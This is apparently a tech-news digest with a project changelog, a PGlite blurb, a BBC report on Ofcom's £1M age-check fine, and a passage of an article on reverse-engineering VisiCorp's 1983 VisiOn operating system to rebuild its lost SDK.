  • New : Segment-based leadership rotation and load balancing
  • New : Automatic rollover and lease-based write fencing
  • New : TCP client protocol with simple text commands
  • New : Interactive CLI for cluster interaction
  • New : Comprehensive test suite for distributed scenarios

Version 0.2.0

  • New : Atomic batch write operations ( batch_append_for_topic )
  • New : Batch read operations ( batch_read_for_topic )
  • New : io_uring support for batch operations on Linux
  • New : Dual storage backends (FD backend with pread/pwrite, mmap backend)
  • New : Namespace isolation via _for_key constructors
  • New : FsyncSchedule::SyncEach and FsyncSchedule::NoFsync modes
  • Improved : Comprehensive documentation with architecture and design docs
  • Improved : Enhanced benchmarking suite with batch operation benchmarks
  • Fixed : Tail read offset tracking in concurrent scenarios

Version 0.1.0

  • Initial release
  • Core WAL functionality
  • Topic-based organization
  • Configurable consistency modes
  • Comprehensive benchmark suite
  • Memory-mapped I/O implementation
  • Persistent read offset tracking

PGlite – Embeddable Postgres

Hacker News
pglite.dev
2025-12-04 10:52:42
Comments...
Original Article

Embeddable Postgres

Run a full Postgres database locally in WASM with reactivity and live sync.

Lightweight

A complete WASM build of Postgres that's under 3MB Gzipped.

Extendable

Dynamic extension loading mechanism, including support for pgvector.

Reactive

Built in support for data loading, synchronisation and live query primitives.

Experience PGlite with database.build

Create and publish a Postgres database using AI
built on PGlite by Supabase :

What would you like to create?

Try PGlite Now

This is a full PGlite Postgres running in your browser.
It even includes pgvector !

Try more extensions in the playground

Porn company fined £1M over inadequate age checks (UK)

Hacker News
www.bbc.co.uk
2025-12-04 10:47:21
Comments...
Original Article

Ofcom has told the BBC it has never heard from a porn company it has fined £1m for failing to comply with the UK Online Safety Act.

It said it had been emailing AVS Group Ltd since it launched its investigation in July, but had not had a response at any point - so the firm had been fined an extra £50,000.

The Act makes it a legal requirement for websites that host pornographic material to put in place what the regulator determines to be "highly effective age assurance" to prevent children from being able to easily access explicit content.

Ofcom said AVS must now implement highly effective age assurance within 72 hours or face an additional penalty of £1,000 a day.

In addition to the AVS fine, Ofcom also announced that one "major social media company" was going through compliance remediation with its enforcement team.

The regulator has not named the platform but says there may be formal action if it does not see sufficient improvement soon.

Ofcom said the fine showed the "tide on online safety" was beginning to turn.

"This year has seen important changes for people, with new measures across many sites and apps now better protecting children from harmful content," said Oliver Griffiths, Ofcom's online safety group director.

"But we need to see much more from tech companies next year and we'll use our full powers if they fall short," he added.

Ofcom has already started issuing fines to some companies for not implementing proper age verification, including deepfake "nudify" applications .

However, online message board 4Chan has so far refused to comply with a £20,000 fine issued by Ofcom over the summer.

The Online Safety Act is being implemented in phases, and is intended to prevent past practices which Ofcom described as online platforms being "unregulated, unaccountable and often unwilling to prioritise people's safety over profits".

Tougher age checks for porn websites were introduced in July, though some people have pointed out these could be easily avoided with a virtual private network (VPN), which reroutes internet traffic.

In October, Pornhub's parent company told BBC News it had seen a 77% drop in UK visitors since the age checks had come in.

Baroness Beeban Kidron, founder of 5Rights Foundation, told the Today programme the fines were "nothing" to tech firms.

"Business disruption is everything," she said.

"Unless we're prepared to use the law, they're not really doing what Parliament asked them to do.

"We need a whole different attitude about the level of intensity and robustness from the regulator to say - we've got the law and we're using it."

The BBC has contacted a company called TubeCorporate, the adult content publishing platform behind AVS group Ltd sites, for a response.

The address which the firm uses is in the central American country Belize, and appears to be the registered address of a large number of companies: although they do not have physical offices there.

Also introduced this year were tougher guidelines on ensuring the internet was safer for women and girls , with Ofcom vowing to name and shame platforms that did not comply.

Critics say the Act needs to be toughened to make the internet safer, particularly for women and girls.

On recreating the lost SDK for a 42-year-old operating system: VisiCorp Visi On

Lobsters
git.sr.ht
2025-12-04 10:42:13
Comments...
Original Article

# On recreating the lost SDK for a 42-year-old operating system: VisiCorp Visi On

Back in 1983, an office software giant VisiCorp released a graphical multitasking operating system for the IBM PC called VisiOn (or Visi On, or Visi-On, it was before the Internet, so anything goes). It was an "open system", so anyone could make programs for it. Well, if they owned an expensive VAX computer and were prepared to shell out $7,000 on the Software Development Kit.

VisiOn was released earlier than Microsoft Windows, Digital Research GEM, or Apple Macintosh. Its COMDEX demo even predates the annoucement of Apple Lisa. But being first doesn't mean getting things right, so this VisiOn of the future did not win the market. Not a single third-party program was released for the system. No one preserved the SDK for the system. The technical documentation roughly amounts to three terse magazine articles and a single Usenet post. Heck, even the copies of the operating system itself are hard to come by.

Despite its low popularity, VisiOn is historically important. It influenced Microsoft's decisions about Windows, and it is a lesson about failing. So, I thought it would be nice to recreate the SDK for it, Homebrew-style. How difficult could it be, right?!

It took me a month of working 1-2 hours a day to produce a specification that allowed Atsuko to implement a clean-room homebrew application for VisiOn that is capable of bitmap display, menus and mouse handling.

If you're wondering what it felt like: this project is the largest "Sudoku puzzle" I have ever tried to solve. In this note, I have tried to explain the process of solving this puzzle, as well as noteworthy things about VisiOn and its internals. But, first things first...

# The first-ever third-party application for VisiOn

Pyramid Game is a simple patience card game that demonstrates the basics of application development for VisiOn. It comes with an installer and features loadable fonts, bitmaps, clickable areas ("buttons"), and a menu system.

You now can download the floppy image and the distribution files . Obviously, you will need an installed VisiOn system to run it. The rules of the game can be found on Wikipedia .

The source code is available in its own repo .

The claim of Pyramid being "the first-ever" third-party application is a bit strong. VisiOn was an "open system", and so it is theoretically possible someone bought a VisiOn ToolKit and made third-party applications for VisiOn. But even if they did, they never published or sold them. So, Pyramid is the first-ever published third-party application for VisiOn.

# Target audience of this note

This note is aimed at technically inclined readers with software engineering and coding background who want to learn more about vintage operating systems and reverse engineering. I'll try to keep the explanations simple at the expense of obscuring some of the technical details; if you want the details, please check out the verbose notes and the test application . I hope to document the operating system at a later date.

This note is quite long. Feel free to scroll to a part that interests you and read from there.

Personally, I find this project fascinating in terms of solarpunk and permacomputing. Imagine: you find an ancient device (42 years is ancient for computers, right?!), an artefact of a previous era, without any documentation. You have all the modern knowledge, and you want to make this mysterious device do things it was not supposed to do originally. Of course, with Visi On it's not quite the same; it runs on the IBM PC, a very well-documented and researched hardware platform.

If you have any feedback or comments, please leave them in the Mastodon thread or in the sr.ht ToDo project . Questions are fine, too!

# A tour of VisiOn quirks

VisiOn was made before many common user interface conventions were invented. It targeted a computer with a tiny resolution of 640x200 pixels, so its authors decided not use any icons. Therefore, VisiOn looks a bit alien. At the same time, it was made by people who knew what they were doing, and it is mostly coherent in its interface decisions.

Here is a copy of the OS tour I gave on Mastodon . I did not insert the clips as inline GIFs because the animations cannot be paused and are very distracting.

Clip: boot process

One immediately obvious thing here is the "hourglass" icon. Some believe that it might have been the first OS to use the hourglass mouse icon, but no, Xerox and InterLisp had it earlier. Apple Lisa, a contemporary, also had a similar mouse cursor.

The main application of the Visi On Application Manager is called "Services". The biggest diference between "Services" and other applications is that its "exit" button shuts down the whole OS.

You can see the screen has a System Menu at the bottom. The system menu is here to manage windows: make them FULL screen, re-FRAME them, CLOSE into an on-desktop button (we'd say "minimise" today) or OPEN them back. You cannot move the windows by their title bars. The system is very happy to beep at you, like it's a vintage PC game.

Clip: window management

VisiOn is a multi-tasking operating system, and it allows launching multiple instances of the same application. To differentiate between them, the user can input the window name during the application startup.

Clip: multiple windows of the same program

In VisiOn, the Tutorial and Help apps implement a simple hyper-text system based on the "button" primitive. The "button" is simply a clickable area on the screen. It highlights by reversing the background and foreground colour when the mouse hovers over the button.

The system uses left-click for most operations. The right click is needed for the "scroll" operation. The user can scroll the documents (if there's something that can be scrolled) and the menu. You can see that the application menu isn't always fully visible, right?

Clip: buttons and scroll

The application menu system in VisiOn is hierarchical. Some operations make the menu behave like a modal window would in Windows or Mac. It is common not to add a "cancel" button in the menu. Instead, the system button STOP is used to cancel the operation.

In other situations, the menu can be navigated back by using the hierarchical menu selector. In either case, the system is "verb" driven - you choose the action ("verb"), and then you choose where the action should apply. The biggest problem is probably that the menu system is inconsistent. Some menus have "back" or "cancel" options, and some don't. Some "verbs" are actually nouns - "Printing". Some verbs start with a capital letter - "Configure" - like they are nouns. Perhaps it is a sign of a menu element that doesn't require "an object". The "object" here is more "grammatical" than a software concept.

Clip: application menu bar

The Archives app is the built-in file manager for the VisiOn and is one of the standard apps. Somewhat surprisingly, it puts deleted files into the "Wastebasket" folder. Windows couldn't do that because of Apple's patents - but Apple clearly wasn't the first (I bet it's coming from Xerox).

The Archives app makes it clear that VisiOn's file system supports long file names. VisiOn runs on top of MS-DOS 2.0, so it has to implement its own FS on top of FAT for this to work. The app can also work in two-pane mode, but it divides the screen horizontally, so long file names would fit on the screen easily.

The "verb"-oriented interface requires the app to show a "NEW" item on the screen, though it is a bit confusing. Can you rename a "NEW" file?

Clip: the Archives application

There are some mysterious buttons we have not explored in VisiOn just yet. One of them, TRANSFER, is used to command the applications to perform a "copy-paste" operation. It is impossible to just "copy" a thing and then "paste" it multiple times.

You can see that the OPEN command is completely unnecessary, because the closed window can be opened simply by clicking its minimised button. It would be nice for VisiOn to remove the OPEN button and replace TRANSFER with separate COPY and PASTE buttons. It shouldn't be too difficult to implement - Transfer From and Transfer Into are different system events from the application point of view. The concept of Copy&Paste wasn't ubiqiutous, but it was not unheard of either, because the VisiOn Word has these options in the application menu, in addition to the system's TRANSFER.

By the way, did you notice a cute VisiOn icon in front of some app names? It is actually two "non-printable" characters, 0x16 and 0x17. The system font has a few more useful icons hidden in it.

Clip: copy and paste

The last important button on the system menu of the VisiOn operating system is OPTIONS. Some applications have a configuration file, and the contents of the configuration file can be displayed on the right side of the window. The Options window behaves like a separate app with a separate menu. It is kind of similar to a pop-up window.

Curiously, it is possible to open the Options window from within the application. The same Options dialogue is shown by Word either by clicking "OPTIONS" or by clicking "Print>local-print". But then Word also has Cut&Paste menu system that allows copying and pasting within the application (but not between the application windows).

Clip: "options" side-bar

# Now, to the technical stuff

# What we thought we knew about Visi On

At face value, Visi On is a sleek, minimalist-looking windowing system for office applications. But it was built by people involved with early object-oriented programming, and the sales pitch for the system made some pretty bold claims. Were they true? Let's find out.

# Fact-checking

This is a spoliers section for those who thought they knew things about Visi On! For everyone else, this is going to be boring - if so, skip to the next section :)

The primary objectives of Visi-On is a consistent user interface and portability. Visi-On is designed to run on any operating system. ("The Visi On experience")

Sort of. Claiming "Visi-On is designed to run on any operating system" is like claiming "Unix is designed to run on any hardware". Clearly, it was made with portability in mind, but even supporting CP/M-86 on IBM PC would require a completely different VISION.EXE, and a different installer floppy format (i.e. you couldn't install Visi On Calc we have on a VisiOn running on top of CP/M). Supporting a different computer architecture would have been quite an ordeal.

It did this by providing a kind of non machine specific "virtual machine" (called the Visi Machine) that all applications were written for. (Toasty Tech)

What you have above Visi On or VOS itself is an interface we call the Visimachine interface. That is all of the calls that you need as a product designer to use all of the facilities provided by Visi On. This is the virtual machine? For product designers, this is the virtual machine. ("Byte", 1983/6)

The term "virtual machine" used by VisiOn developers means something different from what we mean by the words "virtual machine" today. The closest word we use today would be "API". That's right, Visi On applications use a cross-platform API. Just like almost any other operating system today. I bet it was a really cool idea back in 1983, though.

By the way, "VisiHost" for IBM PC is VISION.EXE. The "VisiMachine", which is not a virtual machine, but a set of system libraries and the desktop manager, is also known as "VOS", "VisiOn Operating System", "Application Manager" or simply "Services".

The virtual machine provided supports virtual memory and concurrent processing. ("The Visi On Operating Environment", IEEE TCDE Bulletin, September 1983)

Half-true. Visi On indeed implements virtual memory, but it is a software implementation without any memory protection mechanisms. Nothing but good will stops applications from reading or corrupting memory used by other applications.

The words "concurrent processing" might lead you to believe that VisiOn is a truly multitasking system. But its concurrent processing capabilities are quite limited. It is most definitely not a preemptive multitasking system, because if an application hangs, the whole system hangs. There seem to be some provisions for background data processing, at least for printer spooling. I think a flavour of cooperative multitasking might be possible in VisiOn, but so far I could not find a way to run an application in the background, so maybe it is not multitasking at all!

[The virtual machine] comprises 12 abstract data types. Each abstract data type responds to messages and provides a specific type of service. ("The Visi On Operating Environment", IEEE TCDE Bulletin, September 1983)

Unclear. It seems there are some "messaging" capabilities, but most of the interaction with the OS is still done through regular system calls. So far, I have discovered only messages that create a window, define a menu and request events from the OS. And the messages aren't really related to the "abstract data types". Perhaps, the representation of the objects and data types was different on the source code-level?

Also, this statement contradicts what the authors said about the system in an earlier interview.

Visihost is an object-oriented operating system, and it’s composed of 10 object types... You can establish instances of the objects by just sending messages to them on a Smalltalk message-class type interface. ("Byte", 6/1983)

Half-true. The "objects" do not seem to be "objects" in a modern sense. There is no system of attributes, methods and classes. Instead, there are instances of structures that are passed through the API to the OS. Most of the communication with the OS doesn't happen through messages; it happens through system calls.

In fact, the very same interview confirms this:

An object in Smalltalk basically is a message, yes, that carries with it something that says what can be done to it. Visi On objects are not that complex. They’re objects... yes, they do have context of what their formatting is, but they aren’t Smalltalk objects.

Next!

Activities request services from the Visi-Machine via Visi-Ops or via BITS (Basic Interaction Techniques). The two are distinguished in that a Visi-Op call requires a process ID. (A 16 bit number assigned by Visi-Corp to a given application program). ("Visi On from a Software Developer's point of view", 1983)

Mostly false. It seems VisiCorp itself couldn't agree on what BITS means; sometimes it is used for low-level system calls for the kernel ("VisiHost"), and sometimes it is used to talk about patterns of the user interface. Also, a process ID is not assigned by Visi-Corp; it is evaluated at run time.

VOS (note: VisiMachine) is the only activity that actually does direct Visihost calls. All other calls come through VOS itself. ("Byte", 6/1983)

Mostly true. On the machine code level, applications can and do call the kernel ("VisiHost") directly. But all the existing applications only do so to talk to the Services ("VisiMachine"). On the machine code level, nothing stops the application from calling the VisiHost - this is how VisiMachine is getting things done - but presumably this would harm portability.

Visi On did not, however, include a graphical file manager. ("Visi On", Wikipedia, November 2025)

False. There is an application called Archive, which is a part of the "Services", and it is a bona fide file manager. It does not have icons, though; but there are no icons in any other parts of VisiOn, either.

The scripts capability is another important aspect of ease of use. It’s a learn mode. It has a window that you can interact with. You can stop that learn mode at any time and tell the system to accept a variable. You open a scripts window and say, “learn.” Then the system prompts you for a name, you type in the name, and that will be the name of a script. ("Byte", 6/1983)

Unfortunately, this part of VisiOn seems to be missing from the release. And speaking of missing features, the demo from 1983 also has a mysterious SAVE button that is not present in the final release.

# External sources

Most of the technical documentation about the system available until now comes from the following articles and posts:

# The fun begins!

# Initial investigation

Visi On is meant to run on an IBM PC XT with a hard disk. It won't run properly on an IBM PC AT, and it won't run in most emulators. The pre-installed unprotected version with an AT patch available on ToastyTech runs in some emulators (86Box and PCEm). There are three software packages that can be installed in VisiOn: Word, Calc and Graph. Trying to install them from any old floppy is not possible due to various copy-protection methods (more on this soon).

The installed copy of VisiOn on the hard drive has the executable file VISION.EXE , and a bunch of cryptic files in the VISI_ON folder. Most interesting of those are:

     856 PROGRAMS.VOS -- ??? binary data
  200000 RESERVED.VOS -- resources for the applications? swap?
  777728 SEG00000.VOS -- the actual software installed in the OS?
    3290 SEGMENTS.VOS -- ??? binary data

The files don't have an obvious structure. To grasp a feeling of the file, I use my favourite tool: Load Image From Raw Data in GNU IMP.

Scrolling through the segments surfaces a high-resolution font file and a garbled startup screen:

Are the installed files encrypted?

# Checking the installation media

The installation floppies have the files with names matching those on the hard disk, but they have different content. It is obvious that the contents are encrypted by some simple method. For example, here is the contents of the first installation floppy:

    3110 16 Dec  1983 00000009.VOS -- same as the installed version, but encrypted
   10334 16 Dec  1983 00000010.VOS -- same as the installed version, but encrypted
     110 16 Dec  1983 H0000000.VOS -- a binary directory of files
   65536 16 Dec  1983 SEG10002.VOS -- overlay, seemingly encrypted
   65536 16 Dec  1983 SEG10003.VOS -- overlay, -""-
   65536 16 Dec  1983 SEG10005.VOS -- overlay, -""-
   44604 16 Dec  1983 VINSTALL.COM -- installer tool
   71680 16 Dec  1983 VISION.EXE   -- the program itself, very clearly it is encrypted in some simple way

The contents of the files show a repeating pattern. For example, in SEG10003.VOS:

0000fe50  3c 6a 4f 3c 3c 6a 4f 3c  3c 6a 4f 3c 3c 6a 4f 3c  |<jO<<jO<<jO<<jO<|
0000fe60  3c 6a b0 3c c3 6a 4f 3c  3c 6a 4f 3c 3c 6a 4f 3c  |<j.<.jO<<jO<<jO<|
0000fe70  3c 6a 4f 3c 3c 6a 4f 3c  3c 6a 4f 3c 3c 6a 4f 3c  |<jO<<jO<<jO<<jO<|

Such a repeating pattern is indicative of an encryption with XOR . This is a very poor encryption technique; not only can the encryption key be guessed easily, but a long sequence of zero-bytes will expose the key as it is.

# Tweaking the installation media

The installation floppies are not only encrypted, but also copy-protected with "out-of-bounds" sectors. They require special emulation methods, but thankfully those methods are well described in 86Box and HxC floppy tool documentation.

With a simple encryption and decryption tool, I managed to change the text in the Tutorial app shipped with the operating system and package it back to the (still copy-protected) floppy.

# Figuring out the floppy file system

A floppy with a Visi On program has dozens of files named 00001000.VOS , 00001234.VOS and so on. Which files are mandatory, and what is in them? Lots of trial and error ("let's delete this file, let's put back this file") shows that a floppy must have the following files:

  • 00000000.VOS - simply 12 zeroes
  • 00001000.VOS - the description of the floppy (disk label and the list of programs on it), encrypted
  • 00001001.VOS - a copy-protection mechanism, twice-encrypted
  • an installation script referenced from 00001000.VOS ,
  • components of the program referenced from the installation script

The patterns in the unencrypted files can be observed by simply looking at the files. For example, this is a fragment of 00001000.VOS from the Visi On Calc package:

00000080  16 17 20 43 6f 6e 76 65  72 74 20 74 6f 20 43 61  |.. Convert to Ca|
00000090  6c 63 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |lc..............|
000000a0  31 2e 30 00 00 00 00 00  00 00 00 00 01 00 41 04  |1.0...........A.|
000000b0  00 00 00 00 00 00 00 00                           |........|

Note: IBM PC is a little-endian architecture. The byte sequence 41 04 should be read as 0x0441 , or 1089 in decimal. Sure enough, 00001089.VOS stores the installation script for the program, referencing other files on the floppy disk:

00000000  a7 43 16 17 20 43 6f 6e  76 65 72 74 20 74 6f 20  |.C.. Convert to | <- magic number + logo + name
00000010  43 61 6c 63 00 00 00 00  00 00 00 00 00 00 00 00  |Calc............|
00000020  00 00 31 2e 30 00 00 00  00 00 00 00 00 00 01 00  |..1.0...........| <- version
00000030  03 00 02 00 00 00 00 00  00 00 00 00 00 00 0a 00  |................|
00000040  00 00 01 00 42 04 01 00  02 00 43 04 01 00 01 00  |....B.....C.....| <- 0x442 - first file to install 
00000050  44 04 01 00 02 00 45 04  01 00 02 00 46 04 01 00  |D.....E.....F...|
00000060  02 00 47 04 01 00 02 00  48 04 01 00 01 00 49 04  |..G.....H.....I.|
00000070  01 00 01 00 4a 04 01 00  01 00 4b 04 01 00 01 00  |....J.....K.....|
00000080  00 00 02 00 4c 04                                 |....L.|           <- .... 0x44c - last file to install

# Unencrypted installer

A big obstacle in developing applications is the copy-protection mechanism in 00001001.VOS . The file itself is lightly encrypted with XOR, and then heavily encrypted with XOR once again. Decrypting it and loading it in Ghidra allowed me to understand (generally speaking) that this little tool is an x86 program with a custom header and a single entry point. This entry point is called by the installer to check that the floppy is copy-protected and to decrypt the contents of the floppy.

Atsuko eventually rewrote the copy-protection binary, to skip the encryption and floppy checks. This version of 00001001.VOS is very useful even for installing VisiCorp's programs, as it allows using regular floppy disks, or to tweak the program sources before the installation.

Fun note: the XOR encryption key on software disks is stored in plain text at the beginning of every 00001001.VOS file. Such a glaring oversight!

# Installer script; linking script

Checking unencrypted files (looking closely at their contents in a hex editor) revealed the internal structure of a program package:

  • An installer script: it describes which VOS files are needed by the program,
  • One or more "code segment" files: these mostly contain position-independent machine code for the Intel 8086 CPU (defeating the theory of VisiOn implementing a virtual machine),
  • One "data segment" file: it stores the data needed by the program at all times,
  • One linking script, which is somewhat similar to a header in EXE, DLL or ELF files: it points to a list of all "entry points" in the "code segment" files, and tells the OS where the program's main() function is, and
  • One mini file system with a collection of various files used by the program.

The type of VOS file is determined by two independent factors:

  • The installer script marks the header file and the mini file system in a special way,
  • "Data" and "code" segment files have an 8-byte header (four 16-bit numbers: magic , type of the segment, number of the segment, the length of the segment in bytes)

# Running under the debugger

Operating system development needs a good debugger. Even the history of Windows hints that a good debugger is essential for building a trillion-dollar software empire . And, as you can imagine, Visi On doesn't run under debuggers, so an IBM PC emulator with a built-in debugger is a must.

# Bochs

There are multiple debugging emulators: Qemu, MAME, Bochs, DosBox and MartyPC. None could run Visi On. Among these, Bochs was my primary target, as it can emulate a Mouse Systems mouse - the only mouse type supported by Visi On. Thanks to built-in debugging features, I produced a simple patch that allowed Visi On to boot in Bochs and Qemu. The patch simply skips a few mouse-related checks:

--- visionat.exe.dmp
+++ viatmice.exe.dmp
@@ -2534,4 +2534,4 @@
 0000a010  e8 7a 00 eb 49 b0 83 e8  47 00 e8 81 00 8b 1e 80  |.z..I...G.......|
-0000a020  0b 8d 57 05 ec a8 01 74  f8 8d 57 00 ec 24 f8 3c  |..W....t..W..$.<|
-0000a030  80 75 ee e8 78 00 e8 54  00 eb 23 c7 06 7e 0b ff  |.u..x..T..#..~..|
+0000a020  0b 8d 57 05 ec a8 01 90  90 8d 57 00 ec 24 f8 3c  |..W.......W..$.<|
+0000a030  80 90 90 e8 78 00 e8 54  00 eb 23 c7 06 7e 0b ff  |....x..T..#..~..|
 0000a040  ff 06 b0 33 b4 35 cd 21  8c c0 07 0b c3 bb 7a 06  |...3.5.!......z.|

The Bochs interface rhymes visually with VisiOn, being monochrome and pixelated.

# Mouse driver

If you want to reverse engineer a multi-tasking graphical operating system, the first thing you probably should figure out is its mouse driver. When you start an application, you cannot know where it will be loaded into the computer's memory until it is started. And when it is started, it is already too late to look at the application's initialisation. We need to stop the operating system the very moment we ask to start the program. In other words, the moment we release the mouse button after the double click.

Visi On uses serial mice connected over the COM port. Looking at the emulator events, I can see that the COM port is configured to be interrupt -driven. On an IBM PC, the handler for COM1 port interrupts is known as IRQ4/INT 0x0c. In other words, the address of the mouse driver is recorded in the interrupt table of the computer - it is set to 1a68:0000 , which, by the way, is exactly where it is in VISION.EXE.

In Bochs, you cannot set up a breakpoint (sometimes known as "pause" ) at the interrupt address, but you can set up a breakpoint for the next instruction. When I figured this out, it was easy to set a breakpoint at the mouse driver and understand how the mouse driver works.

Now I could simulate mouse clicking in the following way. RAM address 0x1f21b holds the mouse button status. Writing "1" there makes the OS think there was a right button click. Writing "2" and then "0" works as "press and release the left mouse button". With this, I managed to pinpoint the moment the OS starts an applications.

# Reverse-engineering pains

A tool that can convert machine code back to something human-readable is called a disassembler. There are many options, but I went with NSA's Ghidra as it is the tool I've used in the past to reverse-engineer the Sumikko Gurashi computer .

Normally, disassembly is a straightforward process. Truth to be told, I expected the whole reverse engineering process to take a couple of weekends. If only life was so simple...

# Visi On was compiled by a vintage C compiler

Here is a bit of the disassembly of now-open-source contemporary text editor EDLIN from Microsoft, as seen by Ghidra:

       0000:0119 50              PUSH       AX
       0000:011a b4 30           MOV        AH,0x30     ; syscall 0x30
       0000:011c cd 21           INT        0x21        ; an MS-DOS call
       0000:011e 3c 02           CMP        AL,0x2
       0000:0120 7d 05           JGE        LAB_0000_0127
       0000:0122 ba 8a 10        MOV        DX,0x108a   ; pointer to an error message
       0000:0125 eb e7           JMP        LAB_0000_010e

Here is the corresponding source code:

;----- Check Version Number --------------------------------------------;
        push    ax
        mov     ah,Get_Version
        int     21h
        cmp     al,2
        jae     vers_ok                         ; version >= 2, enter editor
        mov     dx,offset dg:bad_vers_err
        jmp     short errj
;-----------------------------------------------------------------------;

The disassembly basically matches the source code and thus is easy to understand.

Compare with the disassembly coming from VisiOn:

       64c5:0c55 c7 06 16        MOV        word ptr [0x16],0x0
                 00 00 00
       64c5:0c5b 8b 1e 16 00     MOV        BX,word ptr [0x16]
       64c5:0c5f 89 1e 18 00     MOV        word ptr [0x18],BX
       64c5:0c63 8b 0e 18 00     MOV        CX,word ptr [0x18]
       64c5:0c67 89 0e 9c 15     MOV        word ptr [0x159c],CX
       64c5:0c6b 8b 16 9c 15     MOV        DX,word ptr [0x159c]
       64c5:0c6f 89 16 de 09     MOV        word ptr [0x9de],DX
       64c5:0c73 83 ec 02        SUB        SP,0x2
       64c5:0c76 c7 46 d6        MOV        word ptr [BP + -0x2a],0x1
                 01 00
       64c5:0c7b 83 ec 02        SUB        SP,0x2
       64c5:0c7e c7 46 d4        MOV        word ptr [BP + -0x2c],0x1742
                 42 17
       64c5:0c83 e8 9e 00        CALL       define_window

Can you follow the logic?

var_0x16 = 0
BX = var_0x16
var_0x18 = BX
CX = var_0x18
var_0x159c = CX
DX = var_0x159c
var_0x9de = DX
**whack the stack!**
BP[-0x2a] = 1
**whack the stack!**
BP[-0x2c] = 0x1742
CALL       define_window

Do you also feel your blood boiling from seeing the "hot potato" variable definition? It should have been

var_0x16 = 0
var_0x18 = 0
var_0x9de = 0
var_0x159c = 0
BX = 0
CX = 0
DX = 0
CALL define_window(0x1742, 1)

# BP stack frame

The comment "whack the stack!" above is quite representative of what is happening in the code.

Most computers nowadays have a stack . If you don't know what a "stack" is, imagine: you work as a clerk, and your assignments come in the form of sheets of paper with tasks. You put new sheets with tasks on top of the sheets you already have. When you need to process the next task, you usually take the topmost sheet. You might feel bad for all the old tasks at the bottom of the stack, but it is the easiest way to keep track of things.

Here is where "stack frames" come. Now, imagine that you have a coworker obsessed with efficiency. They think that some old tasks should be done before newer tasks, and some new tasks should be done after old tasks. To do so, they take a chunk of the sheets from the stack, rearrange them as they see fit, and put them back in. Sometimes they even grab multiple unrelated chunks of the stack at once. A chunk of a stack is a "stack frame".

Using stack frames simplifies code compilation for subroutines, because a subroutine can assume that it can do whatever it wants with its stack frame, treating it like its own private memory allocated on the global stack. "Forgetting" the data from the stack frame is as simple as moving the stack pointer.

This technique used to be common on x86-based computers some 40 years ago. Ghidra doesn't support it at all. Bochs doesn't care about the BP stack and can only show you the SP stack. VisiOn almost never uses the SP stack directly; most of the applications are working with the BP stack.

I believe this is a property of the C compiler Visi On used. A different compiler might have used SP, just like modern compilers do. And most certainly, a hypothetical Visi On port for Motorola 68k CPU, a processor that doesn't have a BP register, would not need to emulate the BP stack frame.

# Unusual cross-segment calls and "magic" long pointers

# Segment model

The IBM PC, VisiOn target computer, is built around the Intel 8088 processor. A remarkable thing about this processor is that it uses the segment memory model . In a nutshell, at any given moment in time, the program has access to no more than four fragments of the computer's RAM, each 64 kilobytes in size: the code segment, the data segment, the stack segment, and the "extra" segment. This memory organisation simplifies porting programs from 8-bit computers, and in theory allows a straightforward implementation of multi-tasking for small programs. If you have 640 kilobytes of RAM, and your program is configured to use a single segment for all four segments (CS, DS, SS and ES), you could easily load 10 programs at once.

But, as it happens, segments are quite limiting. A single data segment can store about 35 pages of "plain text" in a common 8-bit encoding . If you want to store a long document in the computer's RAM (a novel or a thesis), your program will need to switch between multiple data segments.

By the way, a memory reference to data within a single segment is called a "short pointer". A memory reference to a different segment is called a "far segment". To unambiguously identify a region in memory, you need a "long pointer" consisting of a segment and offset pair.

Things are much worse if a program doesn't fit in a single code segment. For programs running under DOS, it is usually not an issue: the program can assume it has a monopoly over the computer's RAM and just use "CALL FAR" and "JMP FAR" to change the current code segment. Even so, the operating system might load the program into any available memory segment. If the program uses "far" calls or pointers, the operating system must perform a "relocation" . This is how things were done in DOS and early Windows versions.

VisiOn's approach to memory management is different from DOS. Each code segment is position-independent ; it cannot use far CALLs or long pointers. Large programs are split into multiple code segments. When a program is executing a code segment 1 and needs to call a function from a code segment 2, for example, it must do so through the operating system. The benefit of this approach is a software implementation of "virtual memory". If a program is, for example, 2 megabytes large, and the computer only has 512 kB of RAM, the operating system can only keep in RAM the segments of the program that are being executed right now. When a program requests a segment not in the RAM, the OS can load it from the hard drive, in a form of swapping .

By the way, most of the time the ES segment is set to the kernel/OS/VisiHost data segment, and SS is set to DS (the current applications' data segment).

# "Magic" pointers

Even so, VisiOn could have been "normal" about their implementation of virtual memory. A far call might have looked like this: call_segment(segment_number, function_address) . Instead, it looks like this: call(). Magic!

This is what cross-segment calls look like in Ghidra (and it would look exactly the same in any other disassembler):

    5e32:009b cd c1       INT 0xc1                    ; Call operating system entry point 0xc1
    5e32:009d 28 08       SUB byte ptr [BX + SI],CL   ; ??? Change a random memory byte ???

The disassembler assumes that bytes 0x28 0x08 encode a command. It is a normal thing to assume; this is how the Intel x86 processor normally works. But in this case, it is not a command, it is a 16-bit number: 0x0828 . The OS tweaks the return address from the INT 0xc1 handler so these two bytes are skipped by the processor.

I call this kind of number "magic pointers", because a long pointer normally must be two 16-bit numbers: a segment and an offset. But in VisiOn, a single 16-bit number encodes both. This is implemented in a really clever way. Remember the "entry points" table I mentioned?

The "entry points" table has pairs of 16-bit numbers: segment and offset. For example, if a function is stored in a segment file 0x0002 at the offset 0x1234, the table will have both numbers written down:

<entry_points_table:0> 0x1234 0x0002

Now, what is the "magic pointer" then? It is a pointer (or offset) to the address of a row in this table, in bytes, relative to the beginning of the code segment where the entry points table is stored. Baaam!

The code above, INT 0xc1 ; 0x0828 basically tells the OS:

  1. Load the code segment with the entry points table - we told you about it when we installed the program
  2. Go to the position 0x0828 in this code segment and read two numbers from there: offset and segment
  3. Do the far call to a function at segment:offset
  4. When the function is finished, return everything the way it was before

Moreover, the segment references in the entry points table are dynamically refreshed. The operating system keeps track of the physical RAM address where each segment is loaded.

# Code segment reallocations

VisiOn is unusually aggressive at memory management compared to its contemporaries; it keeps swapping code segments in and out. This is very troublesome for debugging.

Imagine that the program you are debugging, currently loaded to the computer's RAM at segment 0x5e32 , makes a cross-segment call at the offset 0x9b (like in the code snippet in the previous chapter). Let's say you're not interested in what is happening in this call, and you want to just "step over" the function call. You expect that when the far call is completed, your program will continue starting from the address 0x5e32:0x09f (the next command after the "magic pointer"). Oh, how naive!

The operating system can (and often does) decide to swap your program out of RAM during the far call. When the OS swaps your program back in, it will put it in the next available code segment, for example, 0x4c4b . The execution will continue not from 0x5e3d:0x09f but from 0x4c4b:0x09f . Your breakpoint at 0x5e32:0x09f won't activate; the debugger's "step over" function simply doesn't work.

# Note: the only thing the application absolutely must do is bounce off the trampoline

